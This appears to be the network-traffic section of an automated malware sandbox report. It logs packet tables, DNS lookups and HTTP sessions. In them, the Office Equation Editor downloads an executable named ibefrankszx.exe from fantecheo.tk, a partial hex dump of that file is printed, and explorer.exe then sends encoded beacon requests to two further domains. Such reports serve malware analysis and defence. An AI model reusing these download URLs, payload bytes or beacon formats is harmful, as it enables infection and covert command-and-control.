                                                    Sep 28, 2021 20:42:28.987322092 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987333059 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987341881 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987353086 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987360001 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987375975 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987385035 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987390995 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987407923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987421036 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987425089 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987443924 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987454891 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987476110 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987495899 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987519026 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987534046 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987538099 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987546921 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987559080 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987572908 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987580061 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987587929 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987601042 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987617970 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987623930 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987633944 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987641096 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987651110 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987663031 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987673044 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987682104 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987693071 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987701893 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987716913 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987725973 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987732887 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987737894 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987754107 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987761974 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987771988 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987776041 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987785101 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987799883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987812042 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987826109 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987837076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987844944 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987859011 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987862110 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987870932 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987878084 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987893105 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987893105 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987909079 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987911940 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987924099 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987925053 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987945080 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987950087 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987957954 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987971067 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987983942 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987993956 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988006115 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988013983 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988028049 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988033056 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988049030 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988066912 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988069057 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988079071 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988089085 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988100052 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988112926 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988120079 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988132000 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988141060 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988149881 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988161087 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988171101 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988179922 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988190889 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988197088 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988215923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988219023 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988236904 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988245964 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988256931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988266945 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988279104 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988286972 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988300085 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988308907 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988322020 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988328934 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988343954 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988352060 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988364935 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988375902 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988389015 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988404036 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988411903 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988423109 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988431931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.988447905 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.988460064 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.989701033 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.990456104 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:29.015140057 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:29.015203953 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:29.471077919 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:44:09.667715073 CEST4916680192.168.2.2299.83.154.118
                                                    Sep 28, 2021 20:44:09.686333895 CEST804916699.83.154.118192.168.2.22
                                                    Sep 28, 2021 20:44:09.686476946 CEST4916680192.168.2.2299.83.154.118
                                                    Sep 28, 2021 20:44:09.686778069 CEST4916680192.168.2.2299.83.154.118
                                                    Sep 28, 2021 20:44:09.706588030 CEST804916699.83.154.118192.168.2.22
                                                    Sep 28, 2021 20:44:09.848998070 CEST804916699.83.154.118192.168.2.22
                                                    Sep 28, 2021 20:44:09.849040985 CEST804916699.83.154.118192.168.2.22
                                                    Sep 28, 2021 20:44:09.849695921 CEST4916680192.168.2.2299.83.154.118
                                                    Sep 28, 2021 20:44:09.849720001 CEST4916680192.168.2.2299.83.154.118
                                                    Sep 28, 2021 20:44:09.868298054 CEST804916699.83.154.118192.168.2.22
                                                    Sep 28, 2021 20:44:30.411731958 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.571422100 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.571552038 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.571886063 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.735729933 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735765934 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735779047 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735796928 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735814095 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735832930 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735848904 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735869884 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735888004 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.735902071 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.736165047 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.736210108 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.736217022 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.898358107 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.898405075 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.898426056 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.898442984 CEST804916763.250.43.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.898531914 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.898566961 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.898571014 CEST4916780192.168.2.2263.250.43.8
                                                    Sep 28, 2021 20:44:30.898575068 CEST4916780192.168.2.2263.250.43.8

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 28, 2021 20:42:28.710421085 CEST5216753192.168.2.228.8.8.8
                                                    Sep 28, 2021 20:42:28.729835987 CEST53521678.8.8.8192.168.2.22
                                                    Sep 28, 2021 20:44:09.606345892 CEST5059153192.168.2.228.8.8.8
                                                    Sep 28, 2021 20:44:09.656146049 CEST53505918.8.8.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.389796972 CEST5780553192.168.2.228.8.8.8
                                                    Sep 28, 2021 20:44:30.410459995 CEST53578058.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Sep 28, 2021 20:42:28.710421085 CEST192.168.2.228.8.8.80x8cf9Standard query (0)fantecheo.tkA (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:09.606345892 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.personowner.guruA (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:30.389796972 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.audiofactaesthetic.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Sep 28, 2021 20:42:28.729835987 CEST8.8.8.8192.168.2.220x8cf9No error (0)fantecheo.tk185.239.243.112A (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:09.656146049 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.personowner.guru99.83.154.118A (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:30.410459995 CEST8.8.8.8192.168.2.220xfc43No error (0)www.audiofactaesthetic.com63.250.43.8A (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:30.410459995 CEST8.8.8.8192.168.2.220xfc43No error (0)www.audiofactaesthetic.com63.250.43.7A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • fantecheo.tk
                                                    • www.personowner.guru
                                                    • www.audiofactaesthetic.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 28, 2021 20:42:28.781491041 CEST0OUTGET /ibefrankszx.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: fantecheo.tk
                                                    Connection: Keep-Alive
                                                    Sep 28, 2021 20:42:28.809154034 CEST2INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Tue, 28 Sep 2021 18:42:28 GMT
                                                    Content-Type: application/x-msdownload
                                                    Content-Length: 624640
                                                    Last-Modified: Tue, 28 Sep 2021 03:45:00 GMT
                                                    Connection: keep-alive
                                                    ETag: "61528fbc-98800"
                                                    Accept-Ranges: bytes
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 85 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 0a 00 00 00 00 00 00 86 97 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 97 09 00 4f 00 00 00 00 a0 09 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 06 00 00 00 a0 09 00 00 08 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 97 09 00 00 00 00 00 48 00 00 00 02 00 05 00 70 f6 00 00 34 00 03 00 03 00 00 00 a3 01 00 06 a4 f6 03 00 90 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 1d 00 00 0a 2a 3a 02 28 1e 00 00 0a 02 03 7d 1d 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 02 00 00 1b 0a 06 2c 18 28 1f 00 00 0a 02 7b 1d 00 00 0a 06 7b 1d 00 00 0a 6f 20 00 00 0a 2b 01 16 2a 76 20 69 1f 79 45 20 29 55 55 a5 5a 28 1f 00 00 0a 02 7b 1d 00 00 0a 6f 21 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 13 00 00 01 25 16 02 7b 1d 00 00 0a 0a 12 00 12 01 fe 15 04 00 00 1b 07 8c 04 00 00 1b 2d 14 71 04 00 00 1b 0b 12 01 07 8c 04 00 00 1b 2d 04 26 14 2b 0b fe 16 04 00 00 1b 6f 22 00 00 0a a2 28 23 00 00 0a 2a 00 00 00 13 30 03 00 19 00 00 00 03 00 00 11 00 7e 03 00 00 04 03 02 61 20 ff 00 00 00 5f 95 03 1e 64 61 0a 2b 00 06 2a 00 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 02 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 02 00 00 04 2a 00 00 13 30 02 00 0e 00 00 00 03 00 00 11 00 02 03 d1 28 0a 00 00 06 0a 2b 00 06 2a 00 00 13 30 03 00 3f 00 00 00 04 00 00 11 00 03 20 ff 00 00 00 5f d2 0a 03 1e 63 d2 0b 02 07 02 7b 02 00 00 04 28 06 00 00 06 7d 02 00 00 04 02 06 02 7b 02 00 00 04 28 06 00 00 06 7d 02 00 00 04 02 7b 02 00 00 04 66 0c 2b 00 08 2a 00 13 30 02 00 58 00 00 00 05 00 00 11 00 15 0a 02 6f 24 00 00 0a 0b 16 13 05 2b 36 00 07 17 59 0b 02 07 6f 25 00 00 0a 0c 00 08 20 ff 00 00 00 5f d2 0d 08 1e 63 d2 13 04 00 11 04 06 28 06 00 00 06 0a 09 06 28 06 00 00 06 0a 00 11 05 17 58 13 05 07 16 fe 02 13 06 11 06 2d c0 06 66 13 07 2b 00 11 07 2a 13 30 02 00 30 00 00 00 06 00 00 11 00 15 0a 02 8e 69 0b
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL/Ra0| @ @4OL H.text{ | `.rsrcL~@@.reloc@BhHp4{*:(}*0$u,({{o +*v iyE )UUZ({o!X*0Mrp%{-q-&+o"(#*0~a _da+*0{+*&}*0(+*0? _c{(}{(}{f+*0Xo$+6Yo% _c((X-f+*00i
                                                    Sep 28, 2021 20:42:28.809184074 CEST3INData Raw: 16 0c 2b 14 00 07 17 59 0b 02 07 91 06 28 06 00 00 06 0a 00 08 17 58 0c 07 16 fe 02 0d 09 2d e4 06 66 13 04 2b 00 11 04 2a 3e 02 16 7d 02 00 00 04 02 28 1e 00 00 0a 00 2a 6e 20 00 01 00 00 8d 77 00 00 01 25 d0 bd 00 00 04 28 26 00 00 0a 80 03 00
                                                    Data Ascii: +Y(X-f+*>}(*n w%(&*B('}*0{+*0A}}}}}}}(}*0-{s(o
                                                    Sep 28, 2021 20:42:28.809206009 CEST4INData Raw: 00 70 73 2c 00 00 0a 7a 03 6f 2b 00 00 0a 0a 16 0c 2b 34 00 02 7b 11 00 00 04 08 6f 32 00 00 0a 74 05 00 00 02 0d 09 6f 16 00 00 06 06 28 36 00 00 0a 13 04 11 04 2c 0a 00 02 08 28 24 00 00 06 00 00 00 08 17 58 0c 08 02 7b 11 00 00 04 6f 37 00 00
                                                    Data Ascii: ps,zo++4{o2to(6,($X{o7-*{o8{o9{}^{}_*0{o7+*0U,r[ps,z+"{o2t,+
                                                    Sep 28, 2021 20:42:28.809228897 CEST6INData Raw: 2b 50 02 17 03 6f 24 00 00 0a 6f 2a 00 00 0a 6f 2b 00 00 0a 03 6f 2b 00 00 0a 28 36 00 00 0a 0c 08 2c 2f 00 00 04 02 03 6f 24 00 00 0a 18 58 02 6f 24 00 00 0a 03 6f 24 00 00 0a 59 18 59 6f 2a 00 00 0a 28 3c 00 00 0a 54 00 de 05 26 00 00 de 00 00
                                                    Data Ascii: +Po$o*o+o+(6,/o$Xo$o$YYo*(<T&*[("(*2(*0#{,(+{+*&}*02{,(+rp{rp(=
                                                    Sep 28, 2021 20:42:28.809351921 CEST7INData Raw: 00 00 06 13 06 de 05 14 13 06 2b 00 11 06 2a 01 10 00 00 00 00 ab 00 0b b6 00 0e 04 00 00 02 56 00 02 03 02 7b 3b 00 00 04 73 4f 00 00 0a 28 5f 00 00 06 00 2a 42 00 02 03 04 73 50 00 00 0a 28 5f 00 00 06 00 2a 42 00 02 03 04 73 4f 00 00 0a 28 5f
                                                    Data Ascii: +*V{;sO(_*BsP(_*BsO(_*FsQ(_*NsR(_*02&,rKps,z{;sJ(_oK*0-&,rKps,zsS(_oK
                                                    Sep 28, 2021 20:42:28.809380054 CEST9INData Raw: 00 13 30 03 00 1f 00 00 00 2c 00 00 11 00 03 16 02 28 60 00 00 06 73 5b 00 00 0a 0a 02 06 28 66 00 00 06 00 06 6f 5c 00 00 0a 00 2a 00 13 30 03 00 42 00 00 00 2d 00 00 11 00 03 14 fe 01 0b 07 2c 0c 00 72 bf 01 00 70 73 2c 00 00 0a 7a 04 14 fe 01
                                                    Data Ascii: 0,(`s[(fo\*0B-,rps,z,rcps,zs[(fo\**(g*0#,rps,z(wo*Z(woo]*0.{s+*0
                                                    Sep 28, 2021 20:42:28.809402943 CEST10INData Raw: 02 7b 25 00 00 04 6f 09 00 00 06 26 00 02 02 7b 21 00 00 04 17 58 7d 21 00 00 04 02 02 7b 23 00 00 04 7d 24 00 00 04 02 7b 25 00 00 04 1f 0a fe 01 0b 07 2c 19 00 02 17 7d 23 00 00 04 02 02 7b 22 00 00 04 17 58 7d 22 00 00 04 00 2b 10 00 02 02 7b
                                                    Data Ascii: {%o&{!X}!{#}${%,}#{"X}"+{#X}#*0K{!Y}!{#,{$}#{"Y}"+{#Y}#*0:{.,s},s-}}%}&
                                                    Sep 28, 2021 20:42:28.809427977 CEST11INData Raw: 00 02 1c 7d 2a 00 00 04 38 3a 06 00 00 02 7b 25 00 00 04 1f 3d fe 01 13 1c 11 1c 2c 1c 00 02 02 7b 21 00 00 04 17 59 28 80 00 00 06 00 02 1d 7d 2a 00 00 04 38 0e 06 00 00 02 7b 25 00 00 04 1f 3e fe 01 13 1d 11 1d 2c 6e 00 02 02 7b 21 00 00 04 17
                                                    Data Ascii: }*8:{%=,{!Y(}*8{%>,n{!Y({!(,{o$}!8{*,8}*{!(88(} ,8z{%(!!,8d{%>"",_
                                                    Sep 28, 2021 20:42:28.809604883 CEST13INData Raw: 01 13 3e 11 3e 39 00 01 00 00 00 02 7b 1b 00 00 04 02 7b 21 00 00 04 17 59 02 7b 1e 00 00 04 7b 59 00 00 04 18 58 6f 2a 00 00 0a 72 09 02 00 70 02 7b 1e 00 00 04 6f bd 00 00 06 28 3e 00 00 0a 17 28 63 00 00 0a 16 fe 01 13 3f 11 3f 39 b7 00 00 00
                                                    Data Ascii: >>9{{!Y{{YXo*rp{o(>(c??9{{!YX{oo$Xo%@@>.@(+AA,w{{V{{WX(sBB{!YB{VY}W{Bo&{!Y({!YX
                                                    Sep 28, 2021 20:42:28.809627056 CEST14INData Raw: 04 03 02 7b 20 00 00 04 7b 08 00 00 04 59 7d 09 00 00 04 02 7b 1e 00 00 04 6f e1 00 00 06 02 7b 20 00 00 04 6f 20 00 00 06 26 2a 3a 00 02 7b 20 00 00 04 03 7d 0a 00 00 04 2a 6a 00 02 7b 20 00 00 04 03 02 7b 20 00 00 04 7b 0a 00 00 04 59 7d 0b 00
                                                    Data Ascii: { {Y}{o{ o &*:{ }*j{ { {Y}*0[(s}{{"}Q{{#}R,{%{RY}R{}S*0T={{{VY}W{{J.{
                                                    Sep 28, 2021 20:42:28.836040020 CEST16INData Raw: 00 04 59 7d 59 00 00 04 02 7b 39 00 00 04 0a 06 2c 09 00 02 28 87 00 00 06 00 00 2a 00 00 00 13 30 09 00 92 03 00 00 43 00 00 11 00 02 7b 1e 00 00 04 6f bc 00 00 06 0c 08 2c 05 38 7c 03 00 00 16 0a 02 7b 18 00 00 04 02 7b 1e 00 00 04 6f bd 00 00
                                                    Data Ascii: Y}Y{9,(*0C{o,8|{{oo:t9W{o(9{{o{9sh{o+Ho{o(6,o+,


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.224916699.83.154.11880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 28, 2021 20:44:09.686778069 CEST661OUTGET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1
                                                    Host: www.personowner.guru
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 28, 2021 20:44:09.848998070 CEST661INHTTP/1.1 403 Forbidden
                                                    Date: Tue, 28 Sep 2021 18:44:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.224916763.250.43.880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 28, 2021 20:44:30.571886063 CEST662OUTGET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1
                                                    Host: www.audiofactaesthetic.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 28, 2021 20:44:30.735729933 CEST663INHTTP/1.1 404 Not Found
                                                    content-type: text/html
                                                    date: Tue, 28 Sep 2021 18:44:30 GMT
                                                    transfer-encoding: chunked
                                                    connection: close
